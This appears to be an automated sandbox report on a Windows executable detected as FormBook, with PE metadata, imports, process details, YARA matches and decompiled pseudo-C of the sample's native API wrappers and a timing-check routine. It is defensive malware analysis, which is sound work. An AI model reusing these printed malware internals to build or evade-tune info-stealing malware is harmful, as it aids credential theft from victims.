          File Version Major:5
          File Version Minor:0
          Subsystem Version Major:5
          Subsystem Version Minor:0
          Import Hash:ad7593902351b94d30c5d42690419916

          Entrypoint Preview

          Instruction
          push ebp
          mov ebp, esp
          sub esp, 000002B0h
          mov byte ptr [ebp-000002A8h], FFFFFFE9h
          mov byte ptr [ebp-000002A7h], FFFFFF90h
          mov byte ptr [ebp-000002A6h], 00000000h
          mov byte ptr [ebp-000002A5h], 00000000h
          mov byte ptr [ebp-000002A4h], 00000000h
          mov byte ptr [ebp-000002A3h], 00000055h
          mov byte ptr [ebp-000002A2h], FFFFFF8Bh
          mov byte ptr [ebp-000002A1h], FFFFFFECh
          mov byte ptr [ebp-000002A0h], 00000056h
          mov byte ptr [ebp-0000029Fh], FFFFFF8Bh
          mov byte ptr [ebp-0000029Eh], 00000075h
          mov byte ptr [ebp-0000029Dh], 00000008h
          mov byte ptr [ebp-0000029Ch], FFFFFFBAh
          mov byte ptr [ebp-0000029Bh], FFFFFF97h
          mov byte ptr [ebp-0000029Ah], 00000008h
          mov byte ptr [ebp-00000299h], 00000000h
          mov byte ptr [ebp-00000298h], 00000000h
          mov byte ptr [ebp-00000297h], 00000057h
          mov byte ptr [ebp-00000296h], FFFFFFEBh
          mov byte ptr [ebp-00000295h], 0000000Eh
          mov byte ptr [ebp-00000294h], FFFFFF8Bh
          mov byte ptr [ebp-00000293h], FFFFFFCAh
          mov byte ptr [ebp-00000292h], FFFFFFD1h
          mov byte ptr [ebp-00000291h], FFFFFFE8h
          mov byte ptr [ebp-00000290h], FFFFFFC1h
          mov byte ptr [ebp-0000028Fh], FFFFFFE1h
          mov byte ptr [ebp-0000028Eh], 00000007h
          mov byte ptr [ebp+00000000h], 00000000h

          Rich Headers

          Programming Language:
          • [ C ] VS2008 SP1 build 30729
          • [IMP] VS2008 SP1 build 30729
          • [LNK] VS2008 SP1 build 30729

          Data Directories

          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x30840x78.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x30000x84.rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x12480x1400False0.470703125data4.74743195609IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          .rdata0x30000x3ae0x400False0.53515625data4.4688660684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

          Imports

          DLLImport
          GDI32.dllCreateCompatibleDC, SelectObject, SetBoundsRect, GetTextMetricsW, GdiArtificialDecrementDriver, AddFontResourceExA, GetWorldTransform
          SHLWAPI.dllPathCombineW, SHRegOpenUSKeyW, PathIsSystemFolderA, StrNCatW, StrCmpW, PathFindExtensionW, UrlUnescapeA, UrlEscapeW
          WINSPOOL.DRVDeviceCapabilitiesA, GetPrinterDataExW, ConfigurePortA, ConnectToPrinterDlg, DevQueryPrint, DeletePrinterDriverA
          MSVFW32.dllDrawDibBegin, ICClose, MCIWndCreate
          AVIFIL32.dllAVIStreamOpenFromFileA, AVIMakeStreamFromClipboard

          Network Behavior

          No network behavior found

          Code Manipulations

          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          Behavior

          Click to jump to process

          System Behavior

          General

          Start time:10:48:51
          Start date:22/07/2021
          Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe'
          Imagebase:0x400000
          File size:198124 bytes
          MD5 hash:89CFB542CDA6A428CC5C02FEAF3C55F8
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:low

          General

          Start time:10:48:51
          Start date:22/07/2021
          Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe'
          Imagebase:0x400000
          File size:198124 bytes
          MD5 hash:89CFB542CDA6A428CC5C02FEAF3C55F8
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:low

          Disassembly

          Code Analysis

          Reset < >

            Executed Functions

            APIs
            • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FileRead
            • String ID: 2MA$2MA
            • API String ID: 2738559852-947276439
            • Opcode ID: 9231cb5614d8c557bb3e64fc19a9f4c03e9d43485bdcffe22a1bdc3510d441bf
            • Instruction ID: b52bbb6598611d2992268cc9d77447b29299721f77dafbc4b8d1f8dd55c89911
            • Opcode Fuzzy Hash: 9231cb5614d8c557bb3e64fc19a9f4c03e9d43485bdcffe22a1bdc3510d441bf
            • Instruction Fuzzy Hash: 88F0F9B2200108AFCB14DFA9CC91DEB7BA9EF8C354F158649FA5DD7241D630E852CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 37%
            			E00419E00(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
            				void* _t18;
            				void* _t27;
            				intOrPtr* _t28;
            
            				_t13 = _a4;
            				_t28 = _a4 + 0xc48;
            				E0041A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
            				_t6 =  &_a32; // 0x414d32
            				_t12 =  &_a8; // 0x414d32
            				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
            				return _t18;
            			}






            0x00419e03
            0x00419e0f
            0x00419e17
            0x00419e22
            0x00419e3d
            0x00419e45
            0x00419e49

            APIs
            • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FileRead
            • String ID: 2MA$2MA
            • API String ID: 2738559852-947276439
            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
            • Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
            • Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00419D50(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
            				long _t21;
            				void* _t31;
            
            				_t3 = _a4 + 0xc40; // 0xc40
            				E0041A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
            				_t11 =  &_a20; // 0x414b77
            				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
            				return _t21;
            			}





            0x00419d5f
            0x00419d67
            0x00419d89
            0x00419d9d
            0x00419da1

            APIs
            • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CreateFile
            • String ID: wKA
            • API String ID: 823142352-3165208591
            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
            • Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
            • Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 64%
            			E00419F2A(void* __eax, void* __ecx, intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32) {
            				long _t17;
            				void* _t26;
            
            				asm("out 0xb2, eax");
            				asm("lock jo 0x58");
            				_t13 = _a8;
            				_t4 = _t13 + 0xc60; // 0xca0
            				E0041A950(_t26, _a8, _t4,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x30);
            				_t17 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
            				return _t17;
            			}





            0x00419f2b
            0x00419f2e
            0x00419f33
            0x00419f3f
            0x00419f47
            0x00419f69
            0x00419f6d

            APIs
            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: AllocateMemoryVirtual
            • String ID:
            • API String ID: 2167126740-0
            • Opcode ID: 395c09626ae50f7f817281afd2d385ae11457b688b2065b5606197a2056e8641
            • Instruction ID: d0f2b1e1264ccab4336da6658470f8edd5e28067a6e14bb36b5f16e52d5c4024
            • Opcode Fuzzy Hash: 395c09626ae50f7f817281afd2d385ae11457b688b2065b5606197a2056e8641
            • Instruction Fuzzy Hash: 360116B2200209AFCB08DF99DC91DEB77ADEF88354F11851AFE1997241D634E861CBE5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00419F30(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
            				long _t14;
            				void* _t21;
            
            				_t3 = _a4 + 0xc60; // 0xca0
            				E0041A950(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
            				return _t14;
            			}





            0x00419f3f
            0x00419f47
            0x00419f69
            0x00419f6d

            APIs
            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: AllocateMemoryVirtual
            • String ID:
            • API String ID: 2167126740-0
            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
            • Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
            • Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E00419E7A(void* __edx, void* __esi, intOrPtr _a4, void* _a8) {
            				long _t11;
            				void* _t15;
            
            				asm("adc dl, [ebp-0x75]");
            				_t8 = _a4;
            				_t3 = _t8 + 0x10; // 0x300
            				_t4 = _t8 + 0xc50; // 0x40a913
            				E0041A950(_t15, _a4, _t4,  *_t3, 0, 0x2c);
            				_t11 = NtClose(_a8);
            				asm("rcr byte [esi+0x5d], 1");
            				return _t11;
            			}





            0x00419e7f
            0x00419e83
            0x00419e86
            0x00419e8f
            0x00419e97
            0x00419ea5
            0x00419ea6
            0x00419ea9

            APIs
            • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: Close
            • String ID:
            • API String ID: 3535843008-0
            • Opcode ID: 33774ad53f0ed888670ba2349acc016819d85ed5a4db1b4e8b37f078915f6f62
            • Instruction ID: 1795d3674bcaf6965dc5f2cc92f9e4ff899195fe5457ea5e7829a056c149e73c
            • Opcode Fuzzy Hash: 33774ad53f0ed888670ba2349acc016819d85ed5a4db1b4e8b37f078915f6f62
            • Instruction Fuzzy Hash: FBE08C752001006FD720DBA8DC96EEB7F29EF48360F194499F9AC9B243C531E551CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 82%
            			E00419E80(void* __esi, intOrPtr _a4, void* _a8) {
            				long _t8;
            				void* _t11;
            
            				_t5 = _a4;
            				_t2 = _t5 + 0x10; // 0x300
            				_t3 = _t5 + 0xc50; // 0x40a913
            				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
            				_t8 = NtClose(_a8);
            				asm("rcr byte [esi+0x5d], 1");
            				return _t8;
            			}





            0x00419e83
            0x00419e86
            0x00419e8f
            0x00419e97
            0x00419ea5
            0x00419ea6
            0x00419ea9

            APIs
            • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: Close
            • String ID:
            • API String ID: 3535843008-0
            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
            • Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
            • Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: ef7db263f8ef96a4ac177464b3941e61bd1081335146c8517a27c9e88e3d9f1f
            • Instruction ID: 08e4cd19546d3bd447dd4526378442c1ff09dcb030cbca0bc961e9afb5ebac13
            • Opcode Fuzzy Hash: ef7db263f8ef96a4ac177464b3941e61bd1081335146c8517a27c9e88e3d9f1f
            • Instruction Fuzzy Hash: D190027121108842D2106169940474A000597D0342F55D421B4414658DC6D588A1B161
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 440641afae8cfea189d9ce4d27d47987ec5888f23bd6004618cb52de6e62a034
            • Instruction ID: d35f09fd723b5e0fc727402335f86f0ccb027a0828c8e239d579429ca5bb85cb
            • Opcode Fuzzy Hash: 440641afae8cfea189d9ce4d27d47987ec5888f23bd6004618cb52de6e62a034
            • Instruction Fuzzy Hash: AF90027121100842D2807169540464A000597D1342F91D025B0015654DCA558A69B7E1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: cef44cd72a43edd33dd758a422ebccb973acc75054fc9fec4ad182915803164e
            • Instruction ID: 28958e3a7345ae037eb1f22ac6946906b7cc3b05f9de5d2c3d2373b56091ebe1
            • Opcode Fuzzy Hash: cef44cd72a43edd33dd758a422ebccb973acc75054fc9fec4ad182915803164e
            • Instruction Fuzzy Hash: 1A90027121100453D21161695504707000997D0382F91D422B0414558DD6968962F161
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E00409A80(intOrPtr _a4) {
            				intOrPtr _v8;
            				char _v24;
            				char _v284;
            				char _v804;
            				char _v840;
            				void* _t24;
            				void* _t31;
            				void* _t33;
            				void* _t34;
            				void* _t39;
            				void* _t50;
            				intOrPtr _t52;
            				void* _t53;
            				void* _t54;
            				void* _t55;
            				void* _t56;
            
            				_t52 = _a4;
            				_t39 = 0; // executed
            				_t24 = E00407E80(_t52,  &_v24); // executed
            				_t54 = _t53 + 8;
            				if(_t24 != 0) {
            					E00408090( &_v24,  &_v840);
            					_t55 = _t54 + 8;
            					do {
            						E0041B800( &_v284, 0x104);
            						E0041BE70( &_v284,  &_v804);
            						_t56 = _t55 + 0x10;
            						_t50 = 0x4f;
            						while(1) {
            							_t31 = E00414DB0(E00414D50(_t52, _t50),  &_v284);
            							_t56 = _t56 + 0x10;
            							if(_t31 != 0) {
            								break;
            							}
            							_t50 = _t50 + 1;
            							if(_t50 <= 0x62) {
            								continue;
            							} else {
            							}
            							goto L8;
            						}
            						_t9 = _t52 + 0x14; // 0xffffe055
            						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
            						_t39 = 1;
            						L8:
            						_t33 = E004080C0( &_v24,  &_v840);
            						_t55 = _t56 + 8;
            					} while (_t33 != 0 && _t39 == 0);
            					_t34 = E00408140(_t52,  &_v24); // executed
            					if(_t39 == 0) {
            						asm("rdtsc");
            						asm("rdtsc");
            						_v8 = _t34 - 0 + _t34;
            						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
            					}
            					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
            					_t20 = _t52 + 0x31; // 0x5608758b
            					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
            					return 1;
            				} else {
            					return _t24;
            				}
            			}



















            0x00409a8b
            0x00409a93
            0x00409a95
            0x00409a9a
            0x00409a9f
            0x00409ab2
            0x00409ab7
            0x00409ac0
            0x00409acc
            0x00409adf
            0x00409ae4
            0x00409ae7
            0x00409af0
            0x00409b02
            0x00409b07
            0x00409b0c
            0x00000000
            0x00000000
            0x00409b0e
            0x00409b12
            0x00000000
            0x00000000
            0x00409b14
            0x00000000
            0x00409b12
            0x00409b16
            0x00409b19
            0x00409b1f
            0x00409b21
            0x00409b2c
            0x00409b31
            0x00409b34
            0x00409b41
            0x00409b4c
            0x00409b4e
            0x00409b54
            0x00409b58
            0x00409b5b
            0x00409b5b
            0x00409b62
            0x00409b65
            0x00409b6a
            0x00409b77
            0x00409aa6
            0x00409aa6
            0x00409aa6

            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8cc8ad2602947109d93759c0c81a18c9a26cd20e5980a219460c89eacf67366e
            • Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
            • Opcode Fuzzy Hash: 8cc8ad2602947109d93759c0c81a18c9a26cd20e5980a219460c89eacf67366e
            • Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0041A020(intOrPtr _a4, void* _a8, long _a12, char _a16) {
            				void* _t10;
            				void* _t15;
            
            				E0041A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
            				_t4 =  &_a16; // 0x414c6f
            				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
            				return _t10;
            			}





            0x0041a037
            0x0041a03c
            0x0041a04d
            0x0041a051

            APIs
            • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID: oLA
            • API String ID: 1279760036-3789366272
            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
            • Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
            • Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0041A060(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
            				char _t10;
            				void* _t15;
            
            				_t3 = _a4 + 0xc74; // 0xc74
            				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
            				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
            				return _t10;
            			}





            0x0041a06f
            0x0041a077
            0x0041a08d
            0x0041a091

            APIs
            • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
            • Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
            • Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: ebc133225b45f08709ec2b13017b5077175dab076f9a614fb0ce96a2961d3745
            • Instruction ID: 57eb72967a0576cc9f8e682aceb4822b20c24c5719fec0db515476544a9f3dfa
            • Opcode Fuzzy Hash: ebc133225b45f08709ec2b13017b5077175dab076f9a614fb0ce96a2961d3745
            • Instruction Fuzzy Hash: A0B09B719014D5C9D711D7745608717794077D0741F16C071E1020641A4778C495F5B6
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Strings
            • The critical section is owned by thread %p., xrefs: 00A9B3B9
            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00A9B38F
            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00A9B476
            • Go determine why that thread has not released the critical section., xrefs: 00A9B3C5
            • The resource is owned exclusively by thread %p, xrefs: 00A9B374
            • write to, xrefs: 00A9B4A6
            • The instruction at %p tried to %s , xrefs: 00A9B4B6
            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00A9B305
            • *** Resource timeout (%p) in %ws:%s, xrefs: 00A9B352
            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00A9B53F
            • *** enter .cxr %p for the context, xrefs: 00A9B50D
            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00A9B3D6
            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00A9B484
            • The resource is owned shared by %d threads, xrefs: 00A9B37E
            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00A9B2F3
            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00A9B39B
            • *** then kb to get the faulting stack, xrefs: 00A9B51C
            • *** An Access Violation occurred in %ws:%s, xrefs: 00A9B48F
            • a NULL pointer, xrefs: 00A9B4E0
            • read from, xrefs: 00A9B4AD, 00A9B4B2
            • This failed because of error %Ix., xrefs: 00A9B446
            • <unknown>, xrefs: 00A9B27E, 00A9B2D1, 00A9B350, 00A9B399, 00A9B417, 00A9B48E
            • an invalid address, %p, xrefs: 00A9B4CF
            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00A9B2DC
            • The instruction at %p referenced memory at %p., xrefs: 00A9B432
            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00A9B47D
            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00A9B314
            • *** Inpage error in %ws:%s, xrefs: 00A9B418
            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00A9B323
            • *** enter .exr %p for the exception record, xrefs: 00A9B4F1
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
            • API String ID: 0-108210295
            • Opcode ID: 0af893fc1c159cbfbfd85dd5ecf31c8638fa5df67ab8291d7518fb32b129ffc1
            • Instruction ID: 987f21a123f0c212b5e6477f710239a54ec9216e8919ebaf20c79a37ce5e8997
            • Opcode Fuzzy Hash: 0af893fc1c159cbfbfd85dd5ecf31c8638fa5df67ab8291d7518fb32b129ffc1
